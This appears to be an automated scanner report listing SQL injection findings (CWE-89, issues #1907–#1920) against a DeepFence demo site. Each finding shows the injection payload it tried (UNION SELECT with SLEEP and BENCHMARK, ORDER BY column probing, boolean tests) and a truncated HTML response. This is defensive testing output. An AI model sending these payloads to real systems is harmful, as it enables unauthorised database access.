href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1907\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '*'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1908\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1909\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1910\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1911\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1912\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7506=9091 AND (5913=\n5913\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1913Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1914\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1915\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '=0--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1916\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# WHERE 1=1 AND 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1917\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1918\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT NULL\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1919\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1920\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 